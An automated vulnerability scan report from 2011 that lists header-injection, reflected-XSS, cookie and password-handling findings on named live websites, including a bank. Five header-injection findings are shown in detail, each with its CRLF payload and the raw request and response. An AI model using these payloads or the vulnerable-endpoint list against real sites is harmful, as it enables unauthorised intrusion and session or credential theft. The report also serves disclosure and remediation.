XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07092011-01

Report generated by XSS.CX at Sat Jul 09 06:02:38 CDT 2011.


1. HTTP header injection

1.1. http://techflash.com/about.html [REST URL parameter 1]

1.2. http://www.techflash.com/microsoft [REST URL parameter 1]

1.3. http://www2.bizjournals.com/css/techflash.css [REST URL parameter 2]

1.4. http://www2.bizjournals.com/js/omniture.js [REST URL parameter 2]

1.5. http://www2.bizjournals.com/js/tabs.js [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://seg.sharethis.com/socialOptimization.ps.js [campaign parameter]

2.2. http://widgets.digg.com/buttons/count [url parameter]

2.3. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.4. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.5. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.6. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.7. http://www.bebo.com/c/games [REST URL parameter 2]

2.8. http://www.bebo.com/c/games [REST URL parameter 2]

2.9. http://www.bebo.com/c/games [REST URL parameter 2]

2.10. http://www.bebo.com/c/games [REST URL parameter 2]

2.11. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.12. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.13. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.14. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.15. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.16. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.17. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.18. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.19. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.20. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.21. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.22. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.23. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.24. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.25. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.26. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.27. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.28. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.29. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.30. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.31. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.32. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.33. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.34. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.35. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.36. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.37. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.38. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.39. http://www.bebo.com/c/search [REST URL parameter 2]

2.40. http://www.bebo.com/c/search [REST URL parameter 2]

2.41. http://www.bebo.com/c/search [REST URL parameter 2]

2.42. http://www.bebo.com/c/search [REST URL parameter 2]

2.43. http://www.bebo.com/c/share [REST URL parameter 2]

2.44. http://www.bebo.com/c/share [REST URL parameter 2]

2.45. http://www.bebo.com/c/share [REST URL parameter 2]

2.46. http://www.bebo.com/c/share [REST URL parameter 2]

2.47. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.48. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.49. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.50. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.51. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.52. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.53. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.54. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.55. http://www.masshightech.com/tech-news-widget/parser/ [callback parameter]

2.56. http://www.stumbleupon.com/submit [url parameter]

2.57. http://www.texotela.co.uk/ [name of an arbitrarily supplied request parameter]

2.58. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 1]

2.59. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 2]

2.60. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 3]

2.61. http://www.texotela.co.uk/code/jquery/newsticker/ [name of an arbitrarily supplied request parameter]

2.62. https://wb1.ubs.com/cache/fin/pub/gvu/quotes/markets_instruments [REST URL parameter 6]

2.63. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 3]

2.64. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 4]

2.65. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 5]

3. Cleartext submission of password

3.1. http://twitter.com/intent/session

3.2. http://www.sipc.org/

3.3. http://www.stumbleupon.com/

3.4. http://www.stumbleupon.com/login.php

4. Session token in URL

4.1. http://www.facebook.com/extern/login_status.php

4.2. http://www.softlayer.com/about/contact-us/

5. Flash cross-domain policy

5.1. http://www.facebook.com/crossdomain.xml

5.2. http://www.stumbleupon.com/crossdomain.xml

5.3. http://twitter.com/crossdomain.xml

6. Cookie scoped to parent domain

6.1. http://www.bebo.com/c/share

6.2. http://www.diigo.com/post

6.3. http://www.myspace.com/Modules/PostTo/Pages/

6.4. http://www.opensource.org/licenses/gpl-license.php

6.5. http://www.opensource.org/licenses/mit-license.php

6.6. http://segments.adap.tv/data/

6.7. https://signup.live.com/signup.aspx

6.8. http://social.zune.net/frag/MediaReviewBlock/

6.9. http://social.zune.net/search.aspx

6.10. http://social.zune.net/zPage.aspx

6.11. http://spaces.live.com/BlogIt.aspx

6.12. http://va.px.invitemedia.com/goog_imp

6.13. http://www.bing.com/search

6.14. http://www.bing.com/search

6.15. http://www.burstnet.com/enlightn/7111//82F1/

6.16. http://www.facebook.com/2008/fbml

6.17. http://www.facebook.com/sharer/sharer.php

6.18. http://www.fark.com/cgi/farkit.pl

6.19. http://www.google.com/bookmarks/mark

6.20. http://www.linkedin.com/shareArticle

6.21. http://www.newsvine.com/_tools/seed&save

6.22. http://www.reddit.com/submit

6.23. http://www.tudou.com/v/

6.24. http://www.ubs.com/1/live/homepage/global/sprite_e.css

6.25. http://www.ubs.com/1/live/homepage/shared/icon_arrow_right_white.gif

6.26. http://www.ubs.com/1/live/homepage/shared/index.css

6.27. http://www.ubs.com/1/live/homepage/shared/logo.gif

6.28. http://www.ubs.com/1/live/homepage/shared/thickbox.css

6.29. http://www.zune.net/en-US/legal/codeOfConduct.htm

6.30. http://www.zune.net/en-US/legal/termsofservice.htm

6.31. http://www.zune.net/en-US/press/default.htm

6.32. http://www.zune.net/en-US/support

6.33. http://www.zune.net/en-US/support/

6.34. http://www.zune.net/en-us/legal/safety.htm

6.35. http://www.zune.net/en-us/newsletter/default.htm

6.36. http://www.zune.net/en-us/products/zuneonxbox/default.htm

6.37. http://www.zune.net/en-us/support/accessibility/default.htm

7. Cookie without HttpOnly flag set

7.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp

7.2. http://www.armaniexchange.com/category/womens/sunglasses.do

7.3. http://www.armaniexchange.com/storelocator.do

7.4. http://www.bebo.com/c/share

7.5. http://www.benjaminsterling.com/experiments/jqShuffle/

7.6. http://www.diigo.com/post

7.7. http://www.evernote.com/clip.action

7.8. http://www.linkedin.com/shareArticle

7.9. http://www.myspace.com/Modules/PostTo/Pages/

7.10. http://www.opensource.org/licenses/gpl-license.php

7.11. http://www.opensource.org/licenses/mit-license.php

7.12. http://segments.adap.tv/data/

7.13. https://signup.live.com/signup.aspx

7.14. http://social.zune.net/frag/MediaReviewBlock/

7.15. http://social.zune.net/search.aspx

7.16. http://social.zune.net/zPage.aspx

7.17. http://spaces.live.com/BlogIt.aspx

7.18. http://va.px.invitemedia.com/goog_imp

7.19. https://wordpress.com/wp-login.php

7.20. http://www.bing.com/search

7.21. http://www.bing.com/search

7.22. http://www.burstnet.com/enlightn/7111//82F1/

7.23. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

7.24. http://www.cadence.com/community/themes/default/style/DynamicStyle.aspx

7.25. http://www.facebook.com/2008/fbml

7.26. http://www.google.com/bookmarks/mark

7.27. http://www.masshightech.com/favicon.ico

7.28. http://www.masshightech.com/tech-news-widget/parser/

7.29. http://www.masshightech.com/tech-news-widget/widget.js

7.30. http://www.newsvine.com/_tools/seed&save

7.31. http://www.reddit.com/submit

7.32. http://www.tudou.com/v/

7.33. http://www.zune.net/en-US/legal/codeOfConduct.htm

7.34. http://www.zune.net/en-US/legal/termsofservice.htm

7.35. http://www.zune.net/en-US/press/default.htm

7.36. http://www.zune.net/en-US/support

7.37. http://www.zune.net/en-US/support/

7.38. http://www.zune.net/en-us/legal/safety.htm

7.39. http://www.zune.net/en-us/newsletter/default.htm

7.40. http://www.zune.net/en-us/products/zuneonxbox/default.htm

7.41. http://www.zune.net/en-us/support/accessibility/default.htm

7.42. http://zune.net/en-US/

7.43. http://zune.net/en-US/default.htm

7.44. http://zune.net/en-US/flexpage.aspx

7.45. http://zune.net/en-us/promotions/zunepassatt.htm

7.46. http://zune.net/xweb/www/cms/templates/flexpage.aspx

8. Password field with autocomplete enabled

8.1. http://twitter.com/

8.2. http://twitter.com/

8.3. http://twitter.com/

8.4. http://twitter.com/intent/session

8.5. https://wordpress.com/wp-login.php

8.6. http://www.bebo.com/

8.7. https://www.drtserver.com/microsoft/1/login.html

8.8. http://www.evernote.com/clip.action

8.9. http://www.facebook.com/2008/fbml

8.10. http://www.fark.com/cgi/farkit.pl

8.11. http://www.fark.com/cgi/farkit.pl

8.12. http://www.linkedin.com/shareArticle

8.13. http://www.sipc.org/

8.14. http://www.softlayer.com/about/analyst-relations/

8.15. http://www.softlayer.com/about/careers/

8.16. http://www.softlayer.com/about/contact-us/

8.17. http://www.softlayer.com/about/feedback

8.18. http://www.softlayer.com/cloudlayer/

8.19. http://www.softlayer.com/dedicated/

8.20. http://www.softlayer.com/index.html

8.21. http://www.softlayer.com/legal/

8.22. http://www.softlayer.com/partners/

8.23. http://www.softlayer.com/press

8.24. http://www.softlayer.com/resources/

8.25. http://www.softlayer.com/resources/mobile-apps/

8.26. http://www.softlayer.com/sitemap/

8.27. http://www.softlayer.com/solutions/

8.28. http://www.softlayer.com/specials/

8.29. http://www.softlayer.com/virtualization/

8.30. http://www.stumbleupon.com/

8.31. http://www.stumbleupon.com/login.php

9. Source code disclosure

10. Referer-dependent response

11. Cross-domain POST

11.1. https://www.drtserver.com/microsoft/1/login.html

11.2. http://www.gnu.org/licenses/gpl.html

12. SSL cookie without secure flag set

12.1. https://wordpress.com/wp-login.php

12.2. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

12.3. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif

13. Cross-domain Referer leakage

13.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

13.2. http://social.zune.net/xweb/lx/js/zpagescripts.js

13.3. http://support.microsoft.com/contactus/

13.4. http://twitter.com/intent/session

13.5. http://www.bing.com/search

13.6. http://www.bing.com/search

13.7. http://www.blogger.com/blog_this.pyra

13.8. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

13.9. http://www.evernote.com/clip.action

13.10. http://www.facebook.com/plugins/like.php

13.11. http://www.propeller.com/submit/

13.12. http://www.stumbleupon.com/submit

13.13. http://zune.net/xweb/lx/js/lxUtil.js

14. Cross-domain script include

14.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

14.2. http://social.zune.net/TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D

14.3. http://social.zune.net/album/F59FD406-0100-11DB-89CA-0019B92A3933

14.4. http://techflash.com/

14.5. http://techflash.com/about.html

14.6. http://twitter.com/account/resend_password

14.7. http://twitter.com/intent/session

14.8. https://wordpress.com/wp-login.php

14.9. http://www.armaniexchange.com/category/womens/sunglasses.do

14.10. http://www.armaniexchange.com/storelocator.do

14.11. http://www.beautyoftheweb.com/

14.12. http://www.beautyoftheweb.com/

14.13. http://www.beautyoftheweb.com/

14.14. http://www.bebo.com/

14.15. http://www.bebo.com/Chart.jsp

14.16. http://www.bebo.com/SwitchLanguage.jsp

14.17. http://www.bebo.com/c/invite/join

14.18. http://www.bebo.com/c/photos/view

14.19. http://www.bebo.com/c/search

14.20. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

14.21. http://www.facebook.com/2008/fbml

14.22. http://www.fark.com/cgi/farkit.pl

14.23. http://www.microsofthardwareblog.com/

14.24. http://www.opensource.org/licenses/gpl-license.php

14.25. http://www.opensource.org/licenses/mit-license.php

14.26. http://www.ravenwoodfair.com/viximo.xd_proxy.html

14.27. http://www.softlayer.com/about/analyst-relations/

14.28. http://www.softlayer.com/about/careers/

14.29. http://www.softlayer.com/about/contact-us/

14.30. http://www.softlayer.com/about/feedback

14.31. http://www.softlayer.com/cloudlayer/

14.32. http://www.softlayer.com/dedicated/

14.33. http://www.softlayer.com/index.html

14.34. http://www.softlayer.com/legal/

14.35. http://www.softlayer.com/partners/

14.36. http://www.softlayer.com/press

14.37. http://www.softlayer.com/resources/

14.38. http://www.softlayer.com/resources/mobile-apps/

14.39. http://www.softlayer.com/sitemap/

14.40. http://www.softlayer.com/solutions/

14.41. http://www.softlayer.com/specials/

14.42. http://www.softlayer.com/virtualization/

14.43. http://www.stumbleupon.com/

14.44. http://www.stumbleupon.com/login.php

14.45. http://www.stumbleupon.com/submit

14.46. http://www.texotela.co.uk/

14.47. http://www.texotela.co.uk/code/jquery/newsticker/

14.48. http://www.tudou.com/v/

14.49. http://www.zune.net/en-US/support

14.50. http://www.zune.net/en-US/support/

14.51. http://zuneinsider.com/

15. TRACE method is enabled

15.1. http://widgets.digg.com/

15.2. http://www.stumbleupon.com/

16. Email addresses disclosed

16.1. http://techflash.com/about.html

16.2. http://w.sharethis.com/button/buttons.js

16.3. http://www.beautyoftheweb.com/combres.axd/siteJs/-1234531867/

16.4. http://www.cadence.com/_layouts/_cadenceomniture/s_code.js

16.5. http://www.fark.com/cgi/farkit.pl

16.6. http://www.gnu.org/licenses/gpl.html

16.7. http://www.masshightech.com/tech-news-widget/widget.js

16.8. http://www.mixx.com/submit

16.9. http://www.opensource.org/licenses/gpl-license.php

16.10. http://www.opensource.org/licenses/mit-license.php

16.11. http://www.sipc.org/

16.12. http://www.sipc.org/members/sipclogo.cfm

16.13. http://www.softlayer.com/about/analyst-relations/

16.14. http://www.softlayer.com/about/careers/

16.15. http://www.softlayer.com/about/contact-us/

16.16. http://www.softlayer.com/about/feedback

16.17. http://www.softlayer.com/cloudlayer/

16.18. http://www.softlayer.com/dedicated/

16.19. http://www.softlayer.com/index.html

16.20. http://www.softlayer.com/legal/

16.21. http://www.softlayer.com/partners/

16.22. http://www.softlayer.com/press

16.23. http://www.softlayer.com/resources/

16.24. http://www.softlayer.com/resources/mobile-apps/

16.25. http://www.softlayer.com/sitemap/

16.26. http://www.softlayer.com/solutions/

16.27. http://www.softlayer.com/specials/

16.28. http://www.softlayer.com/virtualization/

16.29. http://www.ubs.com/1/e/index/phishing.html

16.30. http://www.ubs.com/1/e/online/legal/data_source.html

16.31. http://www.ubs.com/1/live/homepage/shared/jquery.cookie.js

16.32. http://www.zune.net/en-US/press/default.htm

16.33. http://www.zune.net/en-us/newsletter/default.htm

17. Private IP addresses disclosed

17.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

17.2. http://static.ak.fbcdn.net/connect/xd_proxy.php

17.3. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/DhINBSBsTFQ.css

17.4. http://www.facebook.com/2008/fbml

17.5. http://www.facebook.com/extern/login_status.php

17.6. http://www.facebook.com/extern/login_status.php

17.7. http://www.facebook.com/plugins/like.php

17.8. http://www.facebook.com/plugins/like.php

17.9. http://www.facebook.com/sharer.php

17.10. http://www.facebook.com/sharer.php

17.11. http://www.facebook.com/sharer.php

17.12. http://www.facebook.com/sharer.php

17.13. http://www.facebook.com/sharer.php

17.14. http://www.facebook.com/sharer.php

17.15. http://www.facebook.com/sharer/sharer.php

17.16. http://www.facebook.com/sharer/sharer.php

17.17. http://www.facebook.com/sharer/sharer.php

17.18. http://www.vimeo.com/moogaloop.swf

18. Credit card numbers disclosed

19. Robots.txt file

19.1. http://tag.admeld.com/pixel

19.2. http://twitter.com/intent/session

19.3. http://widgets.digg.com/buttons/count

19.4. http://www.facebook.com/sharer/sharer.php

19.5. http://www.ibb.ubs.com/favicon.ico

19.6. http://www.stumbleupon.com/submit

19.7. http://www.ubs.com/

19.8. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

19.9. https://www2.ubs.com/1/ssl/e/contact/contact.html

20. Cacheable HTTPS response

20.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp

20.2. https://www.ubs.com/1/e/online/contact.html

20.3. https://www2.ubs.com/1/RenderImage/contact/contact

20.4. https://www2.ubs.com/1/RenderImage/contact/locations

20.5. https://www2.ubs.com/1/RenderImage/contact/order

20.6. https://www2.ubs.com/1/e/contact.html

20.7. https://www2.ubs.com/1/e/contact/contactus.html

20.8. https://www2.ubs.com/1/e/contact/locations.html

20.9. https://www2.ubs.com/1/e/contact/order.html

20.10. https://www2.ubs.com/1/e/globalam/funds.html

20.11. https://www2.ubs.com/1/e/index.html

20.12. https://www2.ubs.com/1/e/index/legalinfo2/disclaimer.html

20.13. https://www2.ubs.com/1/e/index/legalinfo2/privacy.html

20.14. https://www2.ubs.com/1/e/service_finder/individual.html

20.15. https://www2.ubs.com/1/e/ubs_ch/private/cards/creditcards/services/customerservice.html

20.16. https://www2.ubs.com/1/f/contact/locations.html

20.17. https://www2.ubs.com/1/g/contact/locations.html

20.18. https://www2.ubs.com/1/g/contact/order.html

20.19. https://www2.ubs.com/1/i/contact/locations.html

20.20. https://www2.ubs.com/1/ssl/e/contact/contact.html

20.21. https://www2.ubs.com/6/e/contact/locations.html

20.22. https://www2.ubs.com/6/e/contact/order.html

21. HTML does not specify charset

21.1. http://seg.sharethis.com/socialOptimization.ps.js

21.2. http://thezwsxp.com/

21.3. http://thezwsxp.com/favicon.ico

21.4. http://thezwsxp.com/img4/centralLanding.css

21.5. http://thezwsxp.com/index.php

21.6. http://thezwsxp.com/index2.php

21.7. http://thezwsxp.com/undefined

21.8. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

21.9. http://www.ravenwoodfair.com/viximo

21.10. http://www.twitvid.com/player/

21.11. http://www.ubs.com/1/e/index/siterating.html

21.12. http://www.ubs.com/2/e/quotes_help/ubsHelp.htm

21.13. http://www.viddyou.com/get/v2_

21.14. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

22. HTML uses unrecognised charset

22.1. http://vut8rr7o.leoptic.com/index2.php

22.2. http://www.tudou.com/v/

22.3. http://www.ubs.com/4/legal_disclaimer/jp_disclaimer.html

22.4. http://www.ubs.com/4/legal_disclaimer/ko_privacy.html

22.5. http://www.ubs.com/4/legal_disclaimer/ru_privacy.html

22.6. http://www.ubs.com/4/legal_disclaimer/sc_chi_privacy.html

22.7. http://www.ubs.com/4/legal_disclaimer/tr_hk_privacy.html

22.8. http://www.ubs.com/4/legal_disclaimer/tr_tw_privacy.html

23. Content type incorrectly stated

23.1. http://seg.sharethis.com/socialOptimization.ps.js

23.2. http://urls.api.twitter.com/1/urls/count.json

23.3. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

23.4. http://www.cadence.com/_layouts/_cdn_js_lib/js_banners.js

23.5. http://www.cadence.com/_layouts/_cdn_js_lib/js_library.js

23.6. http://www.facebook.com/extern/login_status.php

23.7. http://www.masshightech.com/favicon.ico

23.8. http://www.masshightech.com/tech-news-widget/parser/

23.9. http://www.mister-wong.com/index.php

23.10. http://www.tudou.com/v/

23.11. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

23.12. http://zune.net/en-US/bottom.png

23.13. http://zune.net/en-US/top.png

23.14. http://zune.net/xml/Carousel.xml

24. Content type is not specified

25. SSL certificate

25.1. https://www.ubs.com/

25.2. https://www2.ubs.com/



1. HTTP header injection
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://techflash.com/about.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://techflash.com
Path:   /about.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22627%0d%0a8e444badafd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22627%0d%0a8e444badafd HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-399196261-1309960828609; s_pers=%20s_vnum%3D1312552828670%2526vn%253D1%7C1312552828670%3B%20s_lv%3D1309960845575%7C1404568845575%3B%20s_lv_s%3DFirst%2520Visit%7C1309962645575%3B%20s_dslv%3DFirst%2520Visit%7C1310565645579%3B%20s_p12%3DFirst%2520Visit%7C1310565645581%3B%20s_invisit%3Dtrue%7C1309962645583%3B; s_sess=%20s_ria%3Dflash%252010%257Csilverlight%2520not%2520detected%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:02:07 GMT
Server: Apache
Location: /22627
8e444badafd
/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 200

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/22627
8e444badafd/">here</A>.<P>
</BODY></HTML>

1.2. http://www.techflash.com/microsoft [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.techflash.com
Path:   /microsoft

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3c3d8%0d%0a60579d46399 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3c3d8%0d%0a60579d46399 HTTP/1.1
Host: www.techflash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Wed, 06 Jul 2011 13:57:28 GMT
Server: Apache
Location: /3c3d8
60579d46399
/
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/3c3d8
60579d46399/">here</A>.<P>
</BODY></HTML>

1.3. http://www2.bizjournals.com/css/techflash.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.bizjournals.com
Path:   /css/techflash.css

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9af07%0d%0aafd817301ae was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /css/9af07%0d%0aafd817301ae?v=18 HTTP/1.1
Host: www2.bizjournals.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:00:48 GMT
Server: Apache
Location: /css/9af07
afd817301ae
/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 204

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/css/9af07
afd817301ae/">here</A>.<P>
</BODY></HT
...[SNIP]...

1.4. http://www2.bizjournals.com/js/omniture.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.bizjournals.com
Path:   /js/omniture.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1cfe7%0d%0a87af2d15638 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/1cfe7%0d%0a87af2d15638?v=14 HTTP/1.1
Host: www2.bizjournals.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:01:03 GMT
Server: Apache
Location: /js/1cfe7
87af2d15638
/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 203

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/js/1cfe7
87af2d15638/">here</A>.<P>
</BODY></HTM
...[SNIP]...

1.5. http://www2.bizjournals.com/js/tabs.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.bizjournals.com
Path:   /js/tabs.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 91b43%0d%0ab07f4079d29 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/91b43%0d%0ab07f4079d29?v=10 HTTP/1.1
Host: www2.bizjournals.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:00:43 GMT
Server: Apache
Location: /js/91b43
b07f4079d29
/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 203

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/js/91b43
b07f4079d29/">here</A>.<P>
</BODY></HTM
...[SNIP]...

2. Cross-site scripting (reflected)
There are 65 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

